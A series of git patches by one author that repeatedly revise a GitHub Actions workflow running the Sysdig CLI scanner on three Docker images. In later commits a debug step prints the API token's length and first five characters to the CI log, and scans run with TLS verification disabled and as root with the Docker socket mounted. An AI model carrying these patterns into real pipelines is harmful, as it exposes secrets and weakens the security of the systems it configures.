SECURE_API_TOKEN: ${{ secrets.SECURE_API_TOKEN }} jobs: - image-scan: + scan: runs-on: ubuntu-latest steps: - - name: Checkout + - name: Checkout source uses: actions/checkout@v3 - name: Build Docker images @@ -23,30 +23,26 @@ jobs: docker build -t worker ./worker docker build -t result ./result - - name: Scan voting-app + - name: Run Sysdig CLI Scanner via Docker run: | docker run --rm \ -v /var/run/docker.sock:/var/run/docker.sock \ - quay.io/sysdig/sysdig-cli-scanner:latest \ - scan docker://voting-app \ - --apiurl "$SYS_DIG_SECURE_URL" \ - --token "$SECURE_API_TOKEN" + quay.io/sysdig/sysdig-cli-scanner:1.22.4 \ + --apiurl $SYS_DIG_SECURE_URL \ + --token $SECURE_API_TOKEN \ + docker://voting-app - - name: Scan worker - run: | docker run --rm \ -v /var/run/docker.sock:/var/run/docker.sock \ - quay.io/sysdig/sysdig-cli-scanner:latest \ - scan docker://worker \ - --apiurl "$SYS_DIG_SECURE_URL" \ - --token "$SECURE_API_TOKEN" + quay.io/sysdig/sysdig-cli-scanner:1.22.4 \ + --apiurl $SYS_DIG_SECURE_URL \ + --token $SECURE_API_TOKEN \ + docker://worker - - name: Scan result - run: | docker run --rm \ -v /var/run/docker.sock:/var/run/docker.sock \ - quay.io/sysdig/sysdig-cli-scanner:latest \ - scan docker://result \ - --apiurl "$SYS_DIG_SECURE_URL" \ - --token "$SECURE_API_TOKEN" + quay.io/sysdig/sysdig-cli-scanner:1.22.4 \ + --apiurl $SYS_DIG_SECURE_URL \ + --token $SECURE_API_TOKEN \ + docker://result From d2502e5dff273825b36976df1a997f4223815c5c Mon Sep 17 00:00:00 2001 From: keitahigaki Date: Wed, 16 Jul 2025 09:52:04 +0900 Subject: [PATCH 21/73] correct Sysdig image scan workflow --- .github/workflows/scan.yml | 23 +++++++++++++---------- 1 file changed, 13 insertions(+), 10 deletions(-) diff --git a/.github/workflows/scan.yml b/.github/workflows/scan.yml index 72936770e6..6a37fa7171 100644 --- a/.github/workflows/scan.yml +++ b/.github/workflows/scan.yml @@ -1,4 +1,4 @@ -name: Sysdig Docker Image Scan +name: Sysdig Image Scan on: push: @@ -6,8 +6,8 @@ on: workflow_dispatch: env: - SYS_DIG_SECURE_URL: https://app.au1.sysdig.com - SECURE_API_TOKEN: ${{ secrets.SECURE_API_TOKEN }} + SYSDIG_SECURE_TOKEN: ${{ secrets.SECURE_API_TOKEN }} + SYSDIG_SECURE_URL: https://app.au1.sysdig.com jobs: scan: @@ -23,26 +23,29 @@ jobs: docker build -t worker ./worker docker build -t result ./result - - name: Run Sysdig CLI Scanner via Docker + - name: Run Sysdig Scan via Docker image (scan subcommand) run: | docker run --rm \ -v /var/run/docker.sock:/var/run/docker.sock \ + -e SYSDIG_SECURE_TOKEN=$SYSDIG_SECURE_TOKEN \ quay.io/sysdig/sysdig-cli-scanner:1.22.4 \ - --apiurl $SYS_DIG_SECURE_URL \ - --token $SECURE_API_TOKEN \ + scan \ + --apiurl $SYSDIG_SECURE_URL \ docker://voting-app docker run --rm \ -v /var/run/docker.sock:/var/run/docker.sock \ + -e SYSDIG_SECURE_TOKEN=$SYSDIG_SECURE_TOKEN \ quay.io/sysdig/sysdig-cli-scanner:1.22.4 \ - --apiurl $SYS_DIG_SECURE_URL \ - --token $SECURE_API_TOKEN \ + scan \ + --apiurl $SYSDIG_SECURE_URL \ docker://worker docker run --rm \ -v /var/run/docker.sock:/var/run/docker.sock \ + -e SYSDIG_SECURE_TOKEN=$SYSDIG_SECURE_TOKEN \ quay.io/sysdig/sysdig-cli-scanner:1.22.4 \ - --apiurl $SYS_DIG_SECURE_URL \ - --token $SECURE_API_TOKEN \ + scan \ + --apiurl $SYSDIG_SECURE_URL \ docker://result From 4ee922ea78fe0db5b5fdc9d956635d26a6a4324c Mon Sep 17 00:00:00 2001 From: keitahigaki Date: Wed, 16 Jul 2025 09:54:30 +0900 Subject: [PATCH 22/73] correct Sysdig image scan workflow --- .github/workflows/scan.yml | 32 +++++++++++++++----------------- 1 file changed, 15 insertions(+), 17 deletions(-) diff --git a/.github/workflows/scan.yml b/.github/workflows/scan.yml index 6a37fa7171..3f41f5ada1 100644 --- a/.github/workflows/scan.yml +++ b/.github/workflows/scan.yml @@ -2,19 +2,19 @@ name: Sysdig Image Scan on: push: - branches: [main] + branches: + - main workflow_dispatch: env: - SYSDIG_SECURE_TOKEN: ${{ secrets.SECURE_API_TOKEN }} SYSDIG_SECURE_URL: https://app.au1.sysdig.com jobs: - scan: + image-scan: runs-on: ubuntu-latest steps: - - name: Checkout source + - name: Checkout code uses: actions/checkout@v3 - name: Build Docker images @@ -23,29 +23,27 @@ jobs: docker build -t worker ./worker docker build -t result ./result - - name: Run Sysdig Scan via Docker image (scan subcommand) + - name: Run Sysdig Scan on voting-app run: | docker run --rm \ -v /var/run/docker.sock:/var/run/docker.sock \ - -e SYSDIG_SECURE_TOKEN=$SYSDIG_SECURE_TOKEN \ + -e SECURE_API_TOKEN="${{ secrets.SECURE_API_TOKEN }}" \ quay.io/sysdig/sysdig-cli-scanner:1.22.4 \ - scan \ - --apiurl $SYSDIG_SECURE_URL \ - docker://voting-app + scan --apiurl $SYSDIG_SECURE_URL docker://voting-app + - name: Run Sysdig Scan on worker + run: | docker run --rm \ -v /var/run/docker.sock:/var/run/docker.sock \ - -e SYSDIG_SECURE_TOKEN=$SYSDIG_SECURE_TOKEN \ + -e SECURE_API_TOKEN="${{ secrets.SECURE_API_TOKEN }}" \ quay.io/sysdig/sysdig-cli-scanner:1.22.4 \ - scan \ - --apiurl $SYSDIG_SECURE_URL \ - docker://worker + scan --apiurl $SYSDIG_SECURE_URL docker://worker + - name: Run Sysdig Scan on result + run: | docker run --rm \ -v /var/run/docker.sock:/var/run/docker.sock \ - -e SYSDIG_SECURE_TOKEN=$SYSDIG_SECURE_TOKEN \ + -e SECURE_API_TOKEN="${{ secrets.SECURE_API_TOKEN }}" \ quay.io/sysdig/sysdig-cli-scanner:1.22.4 \ - scan \ - --apiurl $SYSDIG_SECURE_URL \ - docker://result + scan --apiurl $SYSDIG_SECURE_URL docker://result From c10289db5343e68e06e219979a98114f60f47d77 Mon Sep 17 00:00:00 2001 From: keitahigaki Date: Wed, 16 Jul 2025 09:57:16 +0900 Subject: [PATCH 23/73] correct Sysdig image scan workflow --- .github/workflows/scan.yml | 18 +++++++++--------- 1 file changed, 9 insertions(+), 9 deletions(-) diff --git a/.github/workflows/scan.yml b/.github/workflows/scan.yml index 3f41f5ada1..e3d8981d31 100644 --- a/.github/workflows/scan.yml +++ b/.github/workflows/scan.yml @@ -6,13 +6,13 @@ on: - main workflow_dispatch: -env: - SYSDIG_SECURE_URL: https://app.au1.sysdig.com - jobs: image-scan: runs-on: ubuntu-latest + env: + SYSDIG_SECURE_URL: https://app.au1.sysdig.com + steps: - name: Checkout code uses: actions/checkout@v3 @@ -23,27 +23,27 @@ jobs: docker build -t worker ./worker docker build -t result ./result - - name: Run Sysdig Scan on voting-app + - name: Scan voting-app image with Sysdig CLI run: | docker run --rm \ -v /var/run/docker.sock:/var/run/docker.sock \ -e SECURE_API_TOKEN="${{ secrets.SECURE_API_TOKEN }}" \ quay.io/sysdig/sysdig-cli-scanner:1.22.4 \ - scan --apiurl $SYSDIG_SECURE_URL docker://voting-app + scan --apiurl "${SYSDIG_SECURE_URL}" docker://voting-app - - name: Run Sysdig Scan on worker + - name: Scan worker image with Sysdig CLI run: | docker run --rm \ -v /var/run/docker.sock:/var/run/docker.sock \ -e SECURE_API_TOKEN="${{ secrets.SECURE_API_TOKEN }}" \ quay.io/sysdig/sysdig-cli-scanner:1.22.4 \ - scan --apiurl $SYSDIG_SECURE_URL docker://worker + scan --apiurl "${SYSDIG_SECURE_URL}" docker://worker - - name: Run Sysdig Scan on result + - name: Scan result image with Sysdig CLI run: | docker run --rm \ -v /var/run/docker.sock:/var/run/docker.sock \ -e SECURE_API_TOKEN="${{ secrets.SECURE_API_TOKEN }}" \ quay.io/sysdig/sysdig-cli-scanner:1.22.4 \ - scan --apiurl $SYSDIG_SECURE_URL docker://result + scan --apiurl "${SYSDIG_SECURE_URL}" docker://result From 76e40d5be9ea6ccb1d2e1d4e5fe5e38ada7fab01 Mon Sep 17 00:00:00 2001 From: keitahigaki Date: Wed, 16 Jul 2025 10:36:44 +0900 Subject: [PATCH 24/73] correct Sysdig image scan workflow --- .github/workflows/scan.yml | 32 ++++++++++++++++++++------------ 1 file changed, 20 insertions(+), 12 deletions(-) diff --git a/.github/workflows/scan.yml b/.github/workflows/scan.yml index e3d8981d31..b26439d19f 100644 --- a/.github/workflows/scan.yml +++ b/.github/workflows/scan.yml @@ -10,40 +10,48 @@ jobs: image-scan: runs-on: ubuntu-latest + # 🧪 環境変数の注入(ここが非常に重要) env: - SYSDIG_SECURE_URL: https://app.au1.sysdig.com + SECURE_API_TOKEN: ${{ secrets.SECURE_API_TOKEN }} + SYS_DIG_SECURE_URL: https://app.au1.sysdig.com steps: - - name: Checkout code + - name: 🛎️ Checkout code uses: actions/checkout@v3 - - name: Build Docker images + - name: 🏗️ Build Docker images run: | docker build -t voting-app ./vote docker build -t worker ./worker docker build -t result ./result - - name: Scan voting-app image with Sysdig CLI + - name: 🔍 Run Sysdig Scan (voting-app) run: | docker run --rm \ -v /var/run/docker.sock:/var/run/docker.sock \ - -e SECURE_API_TOKEN="${{ secrets.SECURE_API_TOKEN }}" \ quay.io/sysdig/sysdig-cli-scanner:1.22.4 \ - scan --apiurl "${SYSDIG_SECURE_URL}" docker://voting-app + scan \ + --apiurl $SYS_DIG_SECURE_URL \ + --token $SECURE_API_TOKEN \ + docker://voting-app - - name: Scan worker image with Sysdig CLI + - name: 🔍 Run Sysdig Scan (worker) run: | docker run --rm \ -v /var/run/docker.sock:/var/run/docker.sock \ - -e SECURE_API_TOKEN="${{ secrets.SECURE_API_TOKEN }}" \ quay.io/sysdig/sysdig-cli-scanner:1.22.4 \ - scan --apiurl "${SYSDIG_SECURE_URL}" docker://worker + scan \ + --apiurl $SYS_DIG_SECURE_URL \ + --token $SECURE_API_TOKEN \ + docker://worker - - name: Scan result image with Sysdig CLI + - name: 🔍 Run Sysdig Scan (result) run: | docker run --rm \ -v /var/run/docker.sock:/var/run/docker.sock \ - -e SECURE_API_TOKEN="${{ secrets.SECURE_API_TOKEN }}" \ quay.io/sysdig/sysdig-cli-scanner:1.22.4 \ - scan --apiurl "${SYSDIG_SECURE_URL}" docker://result + scan \ + --apiurl $SYS_DIG_SECURE_URL \ + --token $SECURE_API_TOKEN \ + docker://result From 6348a8db5b50f5cf0b3b77c253a8972b38c86fa0 Mon Sep 17 00:00:00 2001 From: keitahigaki Date: Wed, 16 Jul 2025 10:40:52 +0900 Subject: [PATCH 25/73] final Sysdig image scan workflow --- .github/workflows/scan.yml | 26 +++++++++++++------------- 1 file changed, 13 insertions(+), 13 deletions(-) diff --git a/.github/workflows/scan.yml b/.github/workflows/scan.yml index b26439d19f..e2559251ed 100644 --- a/.github/workflows/scan.yml +++ b/.github/workflows/scan.yml @@ -10,7 +10,7 @@ jobs: image-scan: runs-on: ubuntu-latest - # 🧪 環境変数の注入(ここが非常に重要) + # 🧪 環境変数の注入(Secretsから取得) env: SECURE_API_TOKEN: ${{ secrets.SECURE_API_TOKEN }} SYS_DIG_SECURE_URL: https://app.au1.sysdig.com @@ -30,28 +30,28 @@ jobs: docker run --rm \ -v /var/run/docker.sock:/var/run/docker.sock \ quay.io/sysdig/sysdig-cli-scanner:1.22.4 \ - scan \ - --apiurl $SYS_DIG_SECURE_URL \ - --token $SECURE_API_TOKEN \ - docker://voting-app + scan \ + --apiurl $SYS_DIG_SECURE_URL \ + --token $SECURE_API_TOKEN \ + docker://voting-app - name: 🔍 Run Sysdig Scan (worker) run: | docker run --rm \ -v /var/run/docker.sock:/var/run/docker.sock \ quay.io/sysdig/sysdig-cli-scanner:1.22.4 \ - scan \ - --apiurl $SYS_DIG_SECURE_URL \ - --token $SECURE_API_TOKEN \ - docker://worker + scan \ + --apiurl $SYS_DIG_SECURE_URL \ + --token $SECURE_API_TOKEN \ + docker://worker - name: 🔍 Run Sysdig Scan (result) run: | docker run --rm \ -v /var/run/docker.sock:/var/run/docker.sock \ quay.io/sysdig/sysdig-cli-scanner:1.22.4 \ - scan \ - --apiurl $SYS_DIG_SECURE_URL \ - --token $SECURE_API_TOKEN \ - docker://result + scan \ + --apiurl $SYS_DIG_SECURE_URL \ + --token $SECURE_API_TOKEN \ + docker://result From 72af093d353bf584983995826c087c205bc1b37a Mon Sep 17 00:00:00 2001 From: keitahigaki Date: Wed, 16 Jul 2025 12:13:46 +0900 Subject: [PATCH 26/73] final Sysdig image scan --- .github/workflows/scan.yml | 47 +++++++++++++++++++++++--------------- 1 file changed, 29 insertions(+), 18 deletions(-) diff --git a/.github/workflows/scan.yml b/.github/workflows/scan.yml index e2559251ed..f5ce48b24b 100644 --- a/.github/workflows/scan.yml +++ b/.github/workflows/scan.yml @@ -1,16 +1,15 @@ name: Sysdig Image Scan on: + workflow_dispatch: push: branches: - main - workflow_dispatch: jobs: image-scan: runs-on: ubuntu-latest - # 🧪 環境変数の注入(Secretsから取得) env: SECURE_API_TOKEN: ${{ secrets.SECURE_API_TOKEN }} SYS_DIG_SECURE_URL: https://app.au1.sysdig.com @@ -19,39 +18,51 @@ jobs: - name: 🛎️ Checkout code uses: actions/checkout@v3 - - name: 🏗️ Build Docker images + - name: 🧱 Build Docker images run: | docker build -t voting-app ./vote docker build -t worker ./worker docker build -t result ./result - - name: 🔍 Run Sysdig Scan (voting-app) + - name: 🔍 Scan voting-app with Sysdig run: | docker run --rm \ + --platform linux/amd64 \ + --user 0 \ + -v "${{ github.workspace }}/scan-logs:/home/nonroot/scan-logs" \ -v /var/run/docker.sock:/var/run/docker.sock \ + -e SECURE_API_TOKEN=${{ secrets.SECURE_API_TOKEN }} \ quay.io/sysdig/sysdig-cli-scanner:1.22.4 \ - scan \ - --apiurl $SYS_DIG_SECURE_URL \ - --token $SECURE_API_TOKEN \ - docker://voting-app + --apiurl $SYS_DIG_SECURE_URL \ + --loglevel debug \ + --skiptlsverify \ + docker://voting-app - - name: 🔍 Run Sysdig Scan (worker) + - name: 🔍 Scan worker with Sysdig run: | docker run --rm \ + --platform linux/amd64 \ + --user 0 \ + -v "${{ github.workspace }}/scan-logs:/home/nonroot/scan-logs" \ -v /var/run/docker.sock:/var/run/docker.sock \ + -e SECURE_API_TOKEN=${{ secrets.SECURE_API_TOKEN }} \ quay.io/sysdig/sysdig-cli-scanner:1.22.4 \ - scan \ - --apiurl $SYS_DIG_SECURE_URL \ - --token $SECURE_API_TOKEN \ - docker://worker + --apiurl $SYS_DIG_SECURE_URL \ + --loglevel debug \ + --skiptlsverify \ + docker://worker - - name: 🔍 Run Sysdig Scan (result) + - name: 🔍 Scan result with Sysdig run: | docker run --rm \ + --platform linux/amd64 \ + --user 0 \ + -v "${{ github.workspace }}/scan-logs:/home/nonroot/scan-logs" \ -v /var/run/docker.sock:/var/run/docker.sock \ + -e SECURE_API_TOKEN=${{ secrets.SECURE_API_TOKEN }} \ quay.io/sysdig/sysdig-cli-scanner:1.22.4 \ - scan \ - --apiurl $SYS_DIG_SECURE_URL \ - --token $SECURE_API_TOKEN \ - docker://result + --apiurl $SYS_DIG_SECURE_URL \ + --loglevel debug \ + --skiptlsverify \ + docker://result From 49364867c816a952eecc35d8eadff5c62c9b6ab7 Mon Sep 17 00:00:00 2001 From: keitahigaki Date: Wed, 16 Jul 2025 12:20:06 +0900 Subject: [PATCH 27/73] final Sysdig image scan --- .github/workflows/scan.yml | 39 +++++++++++++++++++------------------- 1 file changed, 19 insertions(+), 20 deletions(-) diff --git a/.github/workflows/scan.yml b/.github/workflows/scan.yml index f5ce48b24b..712cbe41da 100644 --- a/.github/workflows/scan.yml +++ b/.github/workflows/scan.yml @@ -1,19 +1,15 @@ name: Sysdig Image Scan on: - workflow_dispatch: push: branches: - main + workflow_dispatch: jobs: image-scan: runs-on: ubuntu-latest - env: - SECURE_API_TOKEN: ${{ secrets.SECURE_API_TOKEN }} - SYS_DIG_SECURE_URL: https://app.au1.sysdig.com - steps: - name: 🛎️ Checkout code uses: actions/checkout@v3 @@ -24,45 +20,48 @@ jobs: docker build -t worker ./worker docker build -t result ./result - - name: 🔍 Scan voting-app with Sysdig + - name: 🛡️ Scan voting-app with Sysdig + env: + SECURE_API_TOKEN: ${{ secrets.SECURE_API_TOKEN }} run: | docker run --rm \ --platform linux/amd64 \ --user 0 \ - -v "${{ github.workspace }}/scan-logs:/home/nonroot/scan-logs" \ -v /var/run/docker.sock:/var/run/docker.sock \ - -e SECURE_API_TOKEN=${{ secrets.SECURE_API_TOKEN }} \ + -e SECURE_API_TOKEN=$SECURE_API_TOKEN \ quay.io/sysdig/sysdig-cli-scanner:1.22.4 \ - --apiurl $SYS_DIG_SECURE_URL \ - --loglevel debug \ + --apiurl https://app.au1.sysdig.com \ + --loglevel info \ --skiptlsverify \ docker://voting-app - - name: 🔍 Scan worker with Sysdig + - name: 🛡️ Scan worker with Sysdig + env: + SECURE_API_TOKEN: ${{ secrets.SECURE_API_TOKEN }} run: | docker run --rm \ --platform linux/amd64 \ --user 0 \ - -v "${{ github.workspace }}/scan-logs:/home/nonroot/scan-logs" \ -v /var/run/docker.sock:/var/run/docker.sock \ - -e SECURE_API_TOKEN=${{ secrets.SECURE_API_TOKEN }} \ + -e SECURE_API_TOKEN=$SECURE_API_TOKEN \ quay.io/sysdig/sysdig-cli-scanner:1.22.4 \ - --apiurl $SYS_DIG_SECURE_URL \ - --loglevel debug \ + --apiurl https://app.au1.sysdig.com \ + --loglevel info \ --skiptlsverify \ docker://worker - - name: 🔍 Scan result with Sysdig + - name: 🛡️ Scan result with Sysdig + env: + SECURE_API_TOKEN: ${{ secrets.SECURE_API_TOKEN }} run: | docker run --rm \ --platform linux/amd64 \ --user 0 \ - -v "${{ github.workspace }}/scan-logs:/home/nonroot/scan-logs" \ -v /var/run/docker.sock:/var/run/docker.sock \ - -e SECURE_API_TOKEN=${{ secrets.SECURE_API_TOKEN }} \ + -e SECURE_API_TOKEN=$SECURE_API_TOKEN \ quay.io/sysdig/sysdig-cli-scanner:1.22.4 \ - --apiurl $SYS_DIG_SECURE_URL \ - --loglevel debug \ + --apiurl https://app.au1.sysdig.com \ + --loglevel info \ --skiptlsverify \ docker://result From ff0ff1472ad646f5026fb6a30b2f7cb40a1d9bc5 Mon Sep 17 00:00:00 2001 From: keitahigaki Date: Wed, 16 Jul 2025 12:22:04 +0900 Subject: [PATCH 28/73] final Sysdig image scan --- .github/workflows/scan.yml | 18 ++++++------------ 1 file changed, 6 insertions(+), 12 deletions(-) diff --git a/.github/workflows/scan.yml b/.github/workflows/scan.yml index 712cbe41da..9bc5d3a42d 100644 --- a/.github/workflows/scan.yml +++ b/.github/workflows/scan.yml @@ -20,45 +20,39 @@ jobs: docker build -t worker ./worker docker build -t result ./result - - name: 🛡️ Scan voting-app with Sysdig - env: - SECURE_API_TOKEN: ${{ secrets.SECURE_API_TOKEN }} + - name: 🔍 Scan with Sysdig (voting-app) run: | docker run --rm \ --platform linux/amd64 \ --user 0 \ -v /var/run/docker.sock:/var/run/docker.sock \ - -e SECURE_API_TOKEN=$SECURE_API_TOKEN \ + -e SECURE_API_TOKEN="${{ secrets.SECURE_API_TOKEN }}" \ quay.io/sysdig/sysdig-cli-scanner:1.22.4 \ --apiurl https://app.au1.sysdig.com \ --loglevel info \ --skiptlsverify \ docker://voting-app - - name: 🛡️ Scan worker with Sysdig - env: - SECURE_API_TOKEN: ${{ secrets.SECURE_API_TOKEN }} + - name: 🔍 Scan with Sysdig (worker) run: | docker run --rm \ --platform linux/amd64 \ --user 0 \ -v /var/run/docker.sock:/var/run/docker.sock \ - -e SECURE_API_TOKEN=$SECURE_API_TOKEN \ + -e SECURE_API_TOKEN="${{ secrets.SECURE_API_TOKEN }}" \ quay.io/sysdig/sysdig-cli-scanner:1.22.4 \ --apiurl https://app.au1.sysdig.com \ --loglevel info \ --skiptlsverify \ docker://worker - - name: 🛡️ Scan result with Sysdig - env: - SECURE_API_TOKEN: ${{ secrets.SECURE_API_TOKEN }} + - name: 🔍 Scan with Sysdig (result) run: | docker run --rm \ --platform linux/amd64 \ --user 0 \ -v /var/run/docker.sock:/var/run/docker.sock \ - -e SECURE_API_TOKEN=$SECURE_API_TOKEN \ + -e SECURE_API_TOKEN="${{ secrets.SECURE_API_TOKEN }}" \ quay.io/sysdig/sysdig-cli-scanner:1.22.4 \ --apiurl https://app.au1.sysdig.com \ --loglevel info \ From d68086c94ca6f26381ab3fdeb5bf001c19665d6e Mon Sep 17 00:00:00 2001 From: keitahigaki Date: Wed, 16 Jul 2025 12:27:37 +0900 Subject: [PATCH 29/73] final Sysdig image scan --- .github/workflows/scan.yml | 16 ++++++++-------- 1 file changed, 8 insertions(+), 8 deletions(-) diff --git a/.github/workflows/scan.yml b/.github/workflows/scan.yml index 9bc5d3a42d..99768f4c7c 100644 --- a/.github/workflows/scan.yml +++ b/.github/workflows/scan.yml @@ -11,48 +11,48 @@ jobs: runs-on: ubuntu-latest steps: - - name: 🛎️ Checkout code + - name: Checkout code uses: actions/checkout@v3 - - name: 🧱 Build Docker images + - name: Build Docker images run: | docker build -t voting-app ./vote docker build -t worker ./worker docker build -t result ./result - - name: 🔍 Scan with Sysdig (voting-app) + - name: Run Sysdig Scan (voting-app) run: | docker run --rm \ --platform linux/amd64 \ --user 0 \ + -e SECURE_API_TOKEN=${{ secrets.SECURE_API_TOKEN }} \ -v /var/run/docker.sock:/var/run/docker.sock \ - -e SECURE_API_TOKEN="${{ secrets.SECURE_API_TOKEN }}" \ quay.io/sysdig/sysdig-cli-scanner:1.22.4 \ --apiurl https://app.au1.sysdig.com \ --loglevel info \ --skiptlsverify \ docker://voting-app - - name: 🔍 Scan with Sysdig (worker) + - name: Run Sysdig Scan (worker) run: | docker run --rm \ --platform linux/amd64 \ --user 0 \ + -e SECURE_API_TOKEN=${{ secrets.SECURE_API_TOKEN }} \ -v /var/run/docker.sock:/var/run/docker.sock \ - -e SECURE_API_TOKEN="${{ secrets.SECURE_API_TOKEN }}" \ quay.io/sysdig/sysdig-cli-scanner:1.22.4 \ --apiurl https://app.au1.sysdig.com \ --loglevel info \ --skiptlsverify \ docker://worker - - name: 🔍 Scan with Sysdig (result) + - name: Run Sysdig Scan (result) run: | docker run --rm \ --platform linux/amd64 \ --user 0 \ + -e SECURE_API_TOKEN=${{ secrets.SECURE_API_TOKEN }} \ -v /var/run/docker.sock:/var/run/docker.sock \ - -e SECURE_API_TOKEN="${{ secrets.SECURE_API_TOKEN }}" \ quay.io/sysdig/sysdig-cli-scanner:1.22.4 \ --apiurl https://app.au1.sysdig.com \ --loglevel info \ From 698337e6fc2975594d0bef20b945102d74b1e862 Mon Sep 17 00:00:00 2001 From: keitahigaki Date: Wed, 16 Jul 2025 12:32:07 +0900 Subject: [PATCH 30/73] Fix: Ensure SECURE_API_TOKEN is injected properly --- .github/workflows/scan.yml | 28 +++++++++++++++++----------- 1 file changed, 17 insertions(+), 11 deletions(-) diff --git a/.github/workflows/scan.yml b/.github/workflows/scan.yml index 99768f4c7c..0883371c60 100644 --- a/.github/workflows/scan.yml +++ b/.github/workflows/scan.yml @@ -11,51 +11,57 @@ jobs: runs-on: ubuntu-latest steps: - - name: Checkout code + - name: 🛎️ Checkout code uses: actions/checkout@v3 - - name: Build Docker images + - name: 🏗️ Build Docker images run: | docker build -t voting-app ./vote docker build -t worker ./worker docker build -t result ./result - - name: Run Sysdig Scan (voting-app) + - name: 🔍 Run Sysdig Scan (voting-app) + env: + SECURE_API_TOKEN: ${{ secrets.SECURE_API_TOKEN }} run: | docker run --rm \ --platform linux/amd64 \ --user 0 \ - -e SECURE_API_TOKEN=${{ secrets.SECURE_API_TOKEN }} \ + -e SECURE_API_TOKEN=$SECURE_API_TOKEN \ -v /var/run/docker.sock:/var/run/docker.sock \ quay.io/sysdig/sysdig-cli-scanner:1.22.4 \ + scan \ --apiurl https://app.au1.sysdig.com \ - --loglevel info \ --skiptlsverify \ docker://voting-app - - name: Run Sysdig Scan (worker) + - name: 🔍 Run Sysdig Scan (worker) + env: + SECURE_API_TOKEN: ${{ secrets.SECURE_API_TOKEN }} run: | docker run --rm \ --platform linux/amd64 \ --user 0 \ - -e SECURE_API_TOKEN=${{ secrets.SECURE_API_TOKEN }} \ + -e SECURE_API_TOKEN=$SECURE_API_TOKEN \ -v /var/run/docker.sock:/var/run/docker.sock \ quay.io/sysdig/sysdig-cli-scanner:1.22.4 \ + scan \ --apiurl https://app.au1.sysdig.com \ - --loglevel info \ --skiptlsverify \ docker://worker - - name: Run Sysdig Scan (result) + - name: 🔍 Run Sysdig Scan (result) + env: + SECURE_API_TOKEN: ${{ secrets.SECURE_API_TOKEN }} run: | docker run --rm \ --platform linux/amd64 \ --user 0 \ - -e SECURE_API_TOKEN=${{ secrets.SECURE_API_TOKEN }} \ + -e SECURE_API_TOKEN=$SECURE_API_TOKEN \ -v /var/run/docker.sock:/var/run/docker.sock \ quay.io/sysdig/sysdig-cli-scanner:1.22.4 \ + scan \ --apiurl https://app.au1.sysdig.com \ - --loglevel info \ --skiptlsverify \ docker://result From 0c0c1742dde8ded27bbaca93c00e4edf4bfed755 Mon Sep 17 00:00:00 2001 From: keitahigaki Date: Wed, 16 Jul 2025 12:35:41 +0900 Subject: [PATCH 31/73] Fix: Ensure SECURE_API_TOKEN is injected properly --- .github/workflows/scan.yml | 40 ++++++++++++++++++++++++-------------- 1 file changed, 25 insertions(+), 15 deletions(-) diff --git a/.github/workflows/scan.yml b/.github/workflows/scan.yml index 0883371c60..8898ba80f6 100644 --- a/.github/workflows/scan.yml +++ b/.github/workflows/scan.yml @@ -10,58 +10,68 @@ jobs: image-scan: runs-on: ubuntu-latest + env: + SYS_DIG_SECURE_URL: https://app.au1.sysdig.com + steps: - name: 🛎️ Checkout code uses: actions/checkout@v3 - - name: 🏗️ Build Docker images + - name: 🐳 Build Docker images run: | docker build -t voting-app ./vote docker build -t worker ./worker docker build -t result ./result - - name: 🔍 Run Sysdig Scan (voting-app) + - name: 🔍 DEBUG: Check if SECURE_API_TOKEN is available + run: | + echo "🔍 Token Length: ${#SECURE_API_TOKEN}" + echo "🔍 Token Head: ${SECURE_API_TOKEN::5}" + if [ -z "$SECURE_API_TOKEN" ]; then + echo "❌ SECURE_API_TOKEN is NOT set!" + exit 1 + else + echo "✅ SECURE_API_TOKEN is available." + fi env: SECURE_API_TOKEN: ${{ secrets.SECURE_API_TOKEN }} + + - name: 🔍 Run Sysdig Scan (voting-app) run: | docker run --rm \ --platform linux/amd64 \ --user 0 \ - -e SECURE_API_TOKEN=$SECURE_API_TOKEN \ -v /var/run/docker.sock:/var/run/docker.sock \ + -e SECURE_API_TOKEN=${{ secrets.SECURE_API_TOKEN }} \ quay.io/sysdig/sysdig-cli-scanner:1.22.4 \ - scan \ - --apiurl https://app.au1.sysdig.com \ + --apiurl $SYS_DIG_SECURE_URL \ --skiptlsverify \ + --loglevel debug \ docker://voting-app - name: 🔍 Run Sysdig Scan (worker) - env: - SECURE_API_TOKEN: ${{ secrets.SECURE_API_TOKEN }} run: | docker run --rm \ --platform linux/amd64 \ --user 0 \ - -e SECURE_API_TOKEN=$SECURE_API_TOKEN \ -v /var/run/docker.sock:/var/run/docker.sock \ + -e SECURE_API_TOKEN=${{ secrets.SECURE_API_TOKEN }} \ quay.io/sysdig/sysdig-cli-scanner:1.22.4 \ - scan \ - --apiurl https://app.au1.sysdig.com \ + --apiurl $SYS_DIG_SECURE_URL \ --skiptlsverify \ + --loglevel debug \ docker://worker - name: 🔍 Run Sysdig Scan (result) - env: - SECURE_API_TOKEN: ${{ secrets.SECURE_API_TOKEN }} run: | docker run --rm \ --platform linux/amd64 \ --user 0 \ - -e SECURE_API_TOKEN=$SECURE_API_TOKEN \ -v /var/run/docker.sock:/var/run/docker.sock \ + -e SECURE_API_TOKEN=${{ secrets.SECURE_API_TOKEN }} \ quay.io/sysdig/sysdig-cli-scanner:1.22.4 \ - scan \ - --apiurl https://app.au1.sysdig.com \ + --apiurl $SYS_DIG_SECURE_URL \ --skiptlsverify \ + --loglevel debug \ docker://result From bdf3d297a89ece60b4817480b5b53e9bd566b168 Mon Sep 17 00:00:00 2001 From: keitahigaki Date: Wed, 16 Jul 2025 12:37:51 +0900 Subject: [PATCH 32/73] Fix: Ensure SECURE_API_TOKEN is injected properly --- .github/workflows/scan.yml | 31 +++---------------------------- 1 file changed, 3 insertions(+), 28 deletions(-) diff --git a/.github/workflows/scan.yml b/.github/workflows/scan.yml index 8898ba80f6..289cefc793 100644 --- a/.github/workflows/scan.yml +++ b/.github/workflows/scan.yml @@ -17,7 +17,7 @@ jobs: - name: 🛎️ Checkout code uses: actions/checkout@v3 - - name: 🐳 Build Docker images + - name: 🏗️ Build Docker images run: | docker build -t voting-app ./vote docker build -t worker ./worker @@ -41,37 +41,12 @@ jobs: docker run --rm \ --platform linux/amd64 \ --user 0 \ + -v "$(pwd)/scan-logs:/home/nonroot/scan-logs" \ -v /var/run/docker.sock:/var/run/docker.sock \ -e SECURE_API_TOKEN=${{ secrets.SECURE_API_TOKEN }} \ quay.io/sysdig/sysdig-cli-scanner:1.22.4 \ --apiurl $SYS_DIG_SECURE_URL \ - --skiptlsverify \ - --loglevel debug \ - docker://voting-app - - - name: 🔍 Run Sysdig Scan (worker) - run: | - docker run --rm \ - --platform linux/amd64 \ - --user 0 \ - -v /var/run/docker.sock:/var/run/docker.sock \ - -e SECURE_API_TOKEN=${{ secrets.SECURE_API_TOKEN }} \ - 